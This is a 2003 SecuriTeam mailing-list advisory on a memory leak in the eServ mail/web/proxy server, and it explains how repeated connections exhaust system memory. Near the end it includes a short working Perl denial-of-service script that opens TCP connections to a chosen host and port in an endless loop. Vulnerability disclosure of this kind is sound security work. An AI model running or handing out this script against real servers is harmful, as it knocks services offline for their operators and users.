[NT] eServ Memory Leak Enables Denial of Service Attacks
From: SecuriTeam (support_at_securiteam.com)
Date: 05/11/03
- Previous message: SecuriTeam: "[NT] Windows Media Player Directory Traversal Vulnerability (WMZ)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 11 May 2003 20:18:54 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
In the US?
Contact Beyond Security at our new California office
housewarming rates on automated network vulnerability
scanning. We also welcome ISPs and other resellers!
Please contact us at: 323-882-8286 or ussales@beyondsecurity.com
- - - - - - - - -
eServ Memory Leak Enables Denial of Service Attacks
------------------------------------------------------------------------
SUMMARY
<http://www.eserv.ru/> eServ is a "Mail, News, Web, FTP and Proxy
Servers". eServ's connection handling routine contains a memory leak that
may be exploited to cause the eServ daemon to become unavailable. Upon
receiving a connection, the server allocates a block of memory on the heap
between 8 and 32 kilobytes in size. The reason for this size variance was
not isolated. This block of memory is not freed on disconnect, leading it
to leak. After several thousand successful connections, memory use on the
system becomes exceedingly high. If memory use on the system becomes
excessively high, the system may become unusable.
DETAILS
Impact:
An attacker who can repeatedly establish connections with the eServ daemon
can cause services running on the vulnerable system (including other
services outside of eServ's process) to fail. The vulnerability can
actually be exploited by accident on high-traffic sites -- each connection
causes a leak. After about 1,000 connections, anywhere between 7.81 MB and
31.25 MB may leak.
To deprive an average server system of resources to the point of failure,
a significant number of connections is required. After 10,000 connections,
78.1 MB to 312.5 MB may leak; in my experience, about 50,000 connections
is sufficient to cause system failure. At this point, 390.5 MB to 1.52 GB
has leaked.
Vendor Contact
Matthew attempted to contact the vendor via info@eserv.ru and
support@eserv.ru. The former address bounced, and no response was received
from the second contact attempt. eServ has a horrible security record,
therefore Matthew recommends using a production server for internet sites.
Exploit
#!/usr/bin/perl
#LEGAL NOTICE: Don't test this on networks you don't administer,
#and do not test this tool on networks you don't own without
#permission of the network owner. You are responsible for all
#damage due to your use of this tool.
use IO::Socket;
print "$0: eServ Remote DoS Exploit\r\n";
print "By Matthew Murphy \<mattmurphy\@kc.rr.com\>\r\n\r\n";
print "Server hostname\: ";
$host = trim(chomp($line = <STDIN>));
print "Service port to probe\: ";
$port = trim(chomp($line = <STDIN>));
print "\r\nBeginning probe -- stop with CTRL+C\r\n";
while (1) {
$f = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host:$port");
undef $f;
}
ADDITIONAL INFORMATION
The information has been provided by <mailto:mattmurphy@kc.rr.com>
Matthew Murphy.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[NT] Windows Media Player Directory Traversal Vulnerability (WMZ)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|
